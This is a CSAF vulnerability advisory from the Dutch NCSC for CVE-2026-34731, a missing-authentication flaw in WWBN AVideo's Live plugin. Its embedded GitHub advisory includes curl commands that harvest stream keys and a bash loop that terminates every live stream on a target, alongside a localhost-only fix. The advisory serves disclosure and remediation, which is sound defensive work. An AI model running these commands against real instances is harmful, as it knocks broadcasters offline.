{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-34731", "tracking": { "current_release_date": "2026-04-01T23:19:27.840584Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-34731", "initial_release_date": "2026-03-31T21:26:31.322402Z", "revision_history": [ { "date": "2026-03-31T21:26:31.322402Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-31T21:26:33.309523Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-31T21:39:06.912498Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-31T21:39:08.789931Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-04-01T15:06:21.150359Z", "number": "5", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-01T15:08:07.199404Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-04-01T22:11:15.370647Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-04-01T22:11:18.520495Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-04-01T23:00:49.625929Z", "number": "9", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-04-01T23:00:52.019629Z", "number": "10", "summary": "NCSC Score updated." } ], "status": "interim", "version": "10" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-34731", "cwe": { "id": "CWE-306", "name": "Missing Authentication for Critical Function" }, "notes": [ { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34731" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34731.json" }, { "category": "description", "text": "## Summary\n\nThe AVideo `on_publish_done.php` endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so.\n\nAn attacker can enumerate active stream keys from the unauthenticated `stats.json.php` endpoint, then send crafted POST requests to `on_publish_done.php` to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform.\n\n## Details\n\nThe file `plugin/Live/on_publish_done.php` processes RTMP server callbacks when a stream ends. It accepts a POST parameter `name` (the stream key) and directly uses it to look up and terminate the corresponding stream session.\n\n```php\n// plugin/Live/on_publish_done.php\n$row = LiveTransmitionHistory::getLatest($_POST['name'], $live_servers_id, 10);\n$insert_row = LiveTransmitionHistory::finishFromTransmitionHistoryId($row['id']);\n```\n\nThere is no authentication check anywhere in the file - no `User::isLogged()`, no `User::isAdmin()`, no token validation. The endpoint is designed to be called by the RTMP server (e.g., Nginx-RTMP), but since it is a standard HTTP endpoint, any external client can call it directly.\n\nAdditionally, stream keys can be harvested from the unauthenticated `stats.json.php` endpoint, which returns information about active streams including their keys.\n\n## Proof of Concept\n\n1. Retrieve active stream keys from the unauthenticated stats endpoint:\n\n```bash\ncurl -s \"https://your-avideo-instance.com/plugin/Live/stats.json.php\" | python3 -m json.tool\n```\n\n2. Terminate a live stream by sending a POST request with the stream key:\n\n```bash\ncurl -X POST \"https://your-avideo-instance.com/plugin/Live/on_publish_done.php\" \\\n -d \"name=STREAM_KEY_HERE\"\n```\n\n3. The server responds with HTTP 200 and the stream is marked as finished in the `live_transmitions_history` table. The streamer's broadcast is terminated.\n\n4. To disrupt all active streams, iterate over keys returned from step 1:\n\n```bash\n#!/bin/bash\n# Terminate all active streams on a target AVideo instance\nTARGET=\"https://your-avideo-instance.com\"\n\ncurl -s \"$TARGET/plugin/Live/stats.json.php\" \\\n | python3 -c \"\nimport sys, json\ndata = json.load(sys.stdin)\nfor stream in data.get('applications', []):\n for client in stream.get('live', {}).get('streams', []):\n print(client.get('name', ''))\n\" | while read -r key; do\n [ -z \"$key\" ] && continue\n echo \"[*] Terminating stream: $key\"\n curl -s -X POST \"$TARGET/plugin/Live/on_publish_done.php\" -d \"name=$key\"\ndone\n```\n\n## Impact\n\nAny unauthenticated attacker can terminate live broadcasts on an AVideo instance. This constitutes a denial-of-service vulnerability against the live streaming functionality. Combined with the unauthenticated stream key enumeration from `stats.json.php`, an attacker can systematically disrupt all active streams on the platform.\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **Severity**: Medium\n\n## Recommended Fix\n\nRestrict the RTMP callback endpoint to localhost connections only at `plugin/Live/on_publish_done.php:3`:\n\n```php\n// plugin/Live/on_publish_done.php:3\nif (!in_array($_SERVER['REMOTE_ADDR'], ['127.0.0.1', '::1'])) {\n http_response_code(403);\n die('Forbidden');\n}\n```\n\nSince this endpoint is designed to be called by the local RTMP server (e.g., Nginx-RTMP), it should only accept requests from localhost. External clients should never be able to invoke it directly.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*", "title": "github - https://api.github.com/advisories/GHSA-4jcg-jxpf-5vq3" }, { "category": "other", "text": "0.00064", "title": "EPSS" }, { "category": "other", "text": "3.7", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd, The value of the most recent EPSS score, Exploit code publicly available", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34731" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34731.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-4jcg-jxpf-5vq3" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4jcg-jxpf-5vq3" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34731" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/WWBN/AVideo/commit/e0b9e71f6f3b34f12ad78c1a69d4e1f584b49673" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-4jcg-jxpf-5vq3" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5893889" ] } ], "title": "CVE-2026-34731" } ] }